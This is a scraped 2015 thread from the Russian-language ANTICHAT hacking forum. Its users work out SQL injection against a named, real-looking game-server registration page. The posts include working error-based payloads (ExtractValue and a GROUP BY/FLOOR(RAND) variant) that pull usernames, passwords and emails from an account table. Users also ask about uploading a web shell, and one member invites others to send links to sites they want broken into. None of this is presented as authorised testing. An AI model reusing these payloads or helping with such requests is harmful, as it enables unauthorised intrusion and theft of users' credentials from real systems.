ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.06.2015, 16:59
|
|
Новичок
Регистрация: 16.12.2013
Сообщений: 6
Провел на форуме:
1354
Репутация:
0
|
|
Сообщение от YaBtr
↑
Если остальные техники вывода не отрабатывают, используйте вывод через ошибку группировки.
через union? Он, там тоже не работает, поскольку запрос выглядит примерно так:
INSERT INTO account VALUES (username,password,email);
И вроде как, union работает только на Select, или я ошибаюсь?
Вообще, вот уязвимый сайт, который пытаюсь взломать... http://wow.kwinta.net/index.php?id=registration.html
Уязвимо поле ввода имени аккаунта...
|
|
|
11.06.2015, 17:15
|
|
Новичок
Регистрация: 16.12.2013
Сообщений: 6
Провел на форуме:
1354
Репутация:
0
|
|
Сообщение от yarbabin
↑
YaBtr про вектор group by
как бы я не пытался его сунуть, появляется ошибка You have an error in your SQL syntax...
Не подскажете, как в моем случае его нужно правильно применять?
|
|
|
|
11.06.2015, 17:24
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418
Репутация:
652
|
|
Вы сами написали вектор вывода для версии, далее все по аналогии.
|
|
|
|
11.06.2015, 17:56
|
|
Новичок
Регистрация: 16.12.2013
Сообщений: 6
Провел на форуме:
1354
Репутация:
0
|
|
Сообщение от YaBtr
↑
Вы сами написали вектор вывода для версии, далее все по аналогии.
Всё понял, получилось, спасибо
Еще вопрос: реально ли залить шелл через эту уязвимость?
|
|
|
|
11.06.2015, 18:06
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от AndreyBerkut
↑
Всё понял, получилось, спасибо
Еще вопрос: реально ли залить шелл через эту уязвимость?
|
|
|
|
11.06.2015, 20:00
|
|
Новичок
Регистрация: 16.05.2015
Сообщений: 1
Провел на форуме:
237
Репутация:
0
|
|
|
|
|
|
11.06.2015, 21:35
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
|
|
|
|
13.06.2015, 11:40
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от AndreyBerkut
↑
Хелп плз
при попытке выполнить
25'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING (group_concat(count(*)),1))from(realmd.account)))) )and(1)='1
появляется ошибка
Query failed : FUNCTION realmd.ExtractValue does not exist
Как я понял, в этой версии mysql еще нет функции
ExtractValue.
Какие есть альтернативы?
P.S.
25'OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select concat_ws(0x3a,username,password,email) from account limit 0,1), 1, 63), FLOOR(RAND(0)*2)))and(1)='1 проходит, выводит: 5.0.67-log
'
|
|
|
|
13.06.2015, 13:06
|
|
Новичок
Регистрация: 12.06.2015
Сообщений: 3
Провел на форуме:
577
Репутация:
0
|
|
всем привет, 2 года пытаюсь взломать нужные мне сайты, но все тщетно..
сегодня ночью прогонял один сайт через Acunetix, выдало вот такие алерты, можно ли их как-то поюзать или фигня?
я давно не затрагивал инъекции и поэтому позабыл уже что и как, на сайте фильтруется запрос " ' " и выползает на его месте %27...
 |
|
|
|
13.06.2015, 13:45
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от Hassle
↑
всем привет, 2 года пытаюсь взломать нужные мне сайты, но все тщетно..
сегодня ночью прогонял один сайт через Acunetix, выдало вот такие алерты, можно ли их как-то поюзать или фигня?
я давно не затрагивал инъекции и поэтому позабыл уже что и как, на сайте фильтруется запрос " ' " и выползает на его месте %27...
вероятно есть скуля в форме регистрации, скидывай ссылку)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
